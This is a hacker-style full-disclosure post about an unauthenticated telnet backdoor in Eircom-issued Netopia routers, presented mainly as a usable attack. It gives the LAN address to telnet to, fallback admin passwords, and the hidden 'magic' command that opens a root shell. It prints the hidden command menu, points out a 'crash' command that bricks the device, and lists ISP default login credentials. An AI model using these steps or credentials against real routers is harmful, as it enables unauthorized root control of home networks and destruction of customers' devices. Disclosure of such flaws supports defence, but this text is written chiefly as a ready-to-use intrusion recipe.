++++++++++++++++++++ FULL DISCLOSURE OF EIRCOM NETOPIA ROUTER BACKDOOR VULNERABILITY! Yes, failcom suck, and they did it again. DERP! They gave us a nice TELNET shell into their routers, and now we can mess about 'cos it spawns a root shell by magic! (and magic is the actual command!) They also left a lovely web interface with supposed remote access capability, but i have to test that fully. Thanks to this, evil people could be hiding "in your switches rerouting your riches!' Disclosed by: Netcat, Hex, Chess. ++++++++++++++++++++ Netopia SOC OS version 7.8.0 has a simple TELNET backdoor. If a malicious attacker is on the local area network of a Netopia router, and they TELNET to 192.168.1.254 they are greeted with the following prompt... There is no password needed! ++++++++++++++++++++ Terminal shell v1.0 Copyright ©2008 Motorola, Inc. All rights reserved. Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch Running Netopia SOC OS version 7.8.0 (build r2) Multimode ADSL Capable (Admin completed login: Full Read/Write access) Netopia-2000/146306722576> ++++++++++++++++++++ If it does ask for a passphrase, we found admin/admin and admin/password worked every time in the wild. At the 'Admin shell' a help command gives you the following menu... ++++++++++++++++++++ Netopia-2000/146306722576> help arp to send ARP request atmping to send ATM OAM loopback clear to erase all stored configuration information clear_certificate to clear stored SSL certificate clear_log to clear stored log data configure to configure unit's options diagnose to run self-test download to download config file exit to quit this shell help to get more: "help all" or "help help" hotspot to set or show hotspot authentication info install to download and program an image into flash license to enter an upgrade key to add a feature log to add a message to the diagnostic log loglevel to report or change diagnostic log level netstat to show IP information nslookup to send DNS query for host ping to send ICMP Echo request quit to quit this shell reset to reset subsystems restart to restart unit show to show system information start to start subsystem status to show basic status of unit telnet to telnet to a remote host traceroute to send traceroute probes upload to upload config file view to view configuration summary wan_type to Set WAN interface type who to show who is using the shell ? to get help: "help all" or "help help" wps to issue Wireless Protected Setup commands Netopia-2000/146306722576> ++++++++++++++++++++ However, typing the command 'magic' (not listed) brings up a new shell... ++++++++++++++++++++ Netopia-2000/146306722576> magic (poof!) Netopia-2000/146306722576# help arp to send ARP request atmping to send ATM OAM loopback brcm to read/write broadcom switch clear to erase all stored configuration information clear_certificate to clear stored SSL certificate clear_log to clear stored log data configure to configure unit's options diagnose to run self-test download to download config file exit to quit this shell help to get more: "help all" or "help help" hotspot to set or show hotspot authentication info install to download and program an image into flash loopback to set the interface in loopback mode license to enter an upgrade key to add a feature log to add a message to the diagnostic log loglevel to report or change diagnostic log level netstat to show IP information nslookup to send DNS query for host ping to send ICMP Echo request quit to quit this shell reset to reset subsystems restart to restart unit rma_count to perform RMA functions show to show system information sslclient to send HTTPS request to the Server. Default Port is 433 start to start subsystem status to show basic status of unit telnet to telnet to a remote host traceroute to send traceroute probes upload to upload config file view to view configuration summary wan_type to Set WAN interface type ata to issue commands related to remote ATA configuration who to show who is using the shell access_code to show if access code is valid bootflags to show or set the bootflags checksum to calculate and display the cksums console to make this session the console mem to display or edit system memory trace to toggle routing tracing crash to cause system death adsldebug to debug commands dsm to DSM commands set_language to set web display language peer-address to print IP address of this shell user ? to get help: "help all" or "help help" wps to issue Wireless Protected Setup commands Netopia-2000/146306722576# +++++++++++++++++++++++ The 'Crash' command literally bricks the router. This shell is the root shell. It gets even worse though... It hasa lovely web interface if you open that web address in a browser! +++++++++++++++++++++++ A malicious attacker on the LAN can do all kinds of things... +++++++++++++++++++++++ ALL ROUTERS ISSUED BY EIRCOM THAT WE HAVE SEEN THUS FAR ARE VULNERABLE. THIS IS JUST AS BAD AS THEIR 'PREDICTABLE WEP KEY GENERATION ALGORITHM. Not to mention, Eircoms default login is always: eircom@eircom.net broadband1 +++++++++++++++++++++++ Thanks for reading! soon to come... can we overflow bit torrent buffers?